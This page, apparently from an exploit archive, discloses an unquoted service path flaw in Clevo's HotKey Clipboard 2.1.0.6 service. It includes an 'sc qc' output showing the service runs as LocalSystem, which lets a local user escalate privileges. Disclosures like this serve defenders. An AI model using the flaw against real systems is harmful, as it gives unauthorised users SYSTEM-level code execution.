Hotkey clipboard 2.1.0.6 privilege escalation unquoted service path Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-03 | Type : local | Platform : windows
This exploit / vulnerability Hotkey clipboard 2.1.0.6 privilege escalation unquoted service path is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path
# Date: 2023/01/17
# Exploit Author : Wim Jaap van Vliet
# Vendor Homepage: www.clevo.com.tw
# Software Link: https://enstrong.blob.core.windows.net/en-driver/PDXXPNX1/Others/CC30_1006.zip
# Version: 2.1.0.6
# Tested on: Windows 11 Pro 10.0.22000

# Exploit
The Hotkey Clipboard Service 'HKClipSvc', installed as part of Control Center3.0 v3.97 (and earlier versions) by Clevo has a unquoted service path.
This software package is usually installed on Clevo laptops (or other brands using Clevo barebones) as a driver.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system.

# Information

C:\>sc qc "HKClipSvc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HKClipSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HotKey Clipboard Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem